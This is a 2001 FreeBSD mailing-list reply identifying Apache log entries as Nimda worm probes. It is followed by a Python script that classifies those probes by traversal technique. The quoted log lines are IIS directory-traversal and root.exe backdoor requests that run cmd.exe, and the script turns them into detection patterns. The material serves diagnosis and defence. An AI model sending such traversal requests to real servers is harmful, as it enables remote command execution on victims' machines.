Date:      Tue, 13 Nov 2001 23:00:56 -0500
From:      Louis LeBlanc <leblanc+freebsd@keyslapper.org>
To:        freebsd-questions@FreeBSD.org, freebsd-questions@FreeBSD.org
Subject:   Re: Do these errors mean my system is comprimised?
Message-ID:  <20011114040055.GB25941@keyslapper.org>
In-Reply-To: <0111131938440F.60958@chip.wiegand.org>
References:  <0111131938440F.60958@chip.wiegand.org>


On 11/13/01 07:38 PM, Chip sat at the `puter and typed:
> I found the following on my apache/freebsd/php/mysql server in my log after
> running analog -
> Looks like someone planted something that wants NT to work correctly -
> 
>  111: /scripts/..%255c../winnt/system32/cmd.exe
>  111:   /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>  106: /scripts/..%5c../winnt/system32/cmd.exe
>  106:   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
>   66: /scripts/root.exe
>   66:   /scripts/root.exe?/c+dir
>   64: /MSADC/root.exe
>   64:   /MSADC/root.exe?/c+dir
>   62: /c/winnt/system32/cmd.exe
>   62:   /c/winnt/system32/cmd.exe?/c+dir
>   59: /d/winnt/system32/cmd.exe
>   59:   /d/winnt/system32/cmd.exe?/c+dir
>   56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
>   56:   /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>   56: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
>   56:   /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>   56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
>   56:   /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>   55: /scripts/..%c1%1c../winnt/system32/cmd.exe
>   55:   /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>   54: /scripts/winnt/system32/cmd.exe
>   54:   /scripts/winnt/system32/cmd.exe?/c+dir
>   54: /scripts/..%c1%9c../winnt/system32/cmd.exe
>   54:   /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>   54: /scripts/..%c0%af../winnt/system32/cmd.exe
>   54:   /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>   51: /scripts/..%252f../winnt/system32/cmd.exe
>   51:   /scripts/..%252f../winnt/system32/cmd.exe?/c+dir


This is the footprint of the Nimda virus *trying* to infect your
system. You can find links to specific info on what Nimda tries to do
on Google, if you want to sort thru a million hits. You can also get
info on how an Apache installation can handle these (or not handle
them) at http://www.keyslapper.org/modules/

Look for the Apache::Nimda page. Even if you don't want to report it
to abuse and SecurityFocus, there are config ideas that will help you
reduce the impact on your log file size.

Also, look for the Apache::404 module. It will handle those misses and
notify you via email - once per period for each URL. It can help you
keep track of Nimda's impact on your server, and keep dead links tied
up.

Enough of the shameless plug.  Check it out.

HTH
Lou
-- 
Louis LeBlanc               leblanc@keyslapper.org
Fully Funded Hobbyist, KeySlapper Extraordinaire :)
http://www.keyslapper.org

Bershere's Formula for Failure:
  There are only two kinds of people who fail: those who
  listen to nobody... and those who listen to everybody.
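The request paths from Chip's analog report, run through a small log detector that groups them by the traversal trick each one uses. This is an added example, not code from the thread or from the Apache::Nimda module Louis mentions; the log lines are constructed in Apache combined format with the quoted paths and TEST-NET hosts, and the family labels are my own.

```python
"""Flag Apache access-log requests matching the Nimda probe footprint quoted above.
Added example, not from the thread; log lines are constructed with the report's paths."""
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote
# Constructed sample: five Nimda-style probes from one TEST-NET host, one normal hit.
LOG_LINES = """\
192.0.2.10 - - [13/Nov/2001:19:02:11 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 207 "-" "-"
192.0.2.10 - - [13/Nov/2001:19:02:11 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 207 "-" "-"
192.0.2.10 - - [13/Nov/2001:19:02:12 -0500] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 207 "-" "-"
192.0.2.10 - - [13/Nov/2001:19:02:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
192.0.2.10 - - [13/Nov/2001:19:02:13 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 205 "-" "-"
192.0.2.77 - - [13/Nov/2001:19:05:40 -0500] "GET /index.php HTTP/1.1" 200 3120 "-" "Mozilla/4.0"
"""
# Combined format: host ident user [time] "method path protocol" status bytes ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3} ')
# Nimda reaches cmd.exe through directory traversal, or uses the root.exe
# backdoor that Code Red II left behind on already-infected IIS hosts.
NIMDA_TARGETS = ("/winnt/system32/cmd.exe", "/root.exe")

def classify(path: str) -> Optional[str]:
    """Probe family for a request path, or None if it is not a Nimda probe.
    Decoding twice mirrors IIS's double-decode flaw, so %255c, %5c and the
    overlong UTF-8 forms (%c1%1c, %c0%af) all expose the same target file."""
    raw = path.split("?", 1)[0].lower()
    decoded = unquote(unquote(raw))  # bad UTF-8 decodes to U+FFFD; harmless here
    if not decoded.endswith(NIMDA_TARGETS):
        return None
    if decoded.endswith("/root.exe"):
        return "root.exe backdoor"
    if "%25" in raw:
        return "double-decode traversal"
    if "%c0" in raw or "%c1" in raw:
        return "unicode traversal"
    if "%5c" in raw or "%2f" in raw:
        return "encoded traversal"
    return "direct cmd.exe path"

def summarize(log_text: str):
    """Count probes per family and collect the probing hosts."""
    families, hosts = Counter(), set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        family = classify(m["path"]) if m else None
        if family is not None:
            families[family] += 1
            hosts.add(m["host"])
    return families, sorted(hosts)
```

The per-family counts are what the analog report above shows in aggregate; the host list is what you would hand to an abuse contact or feed into a 404 filter.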

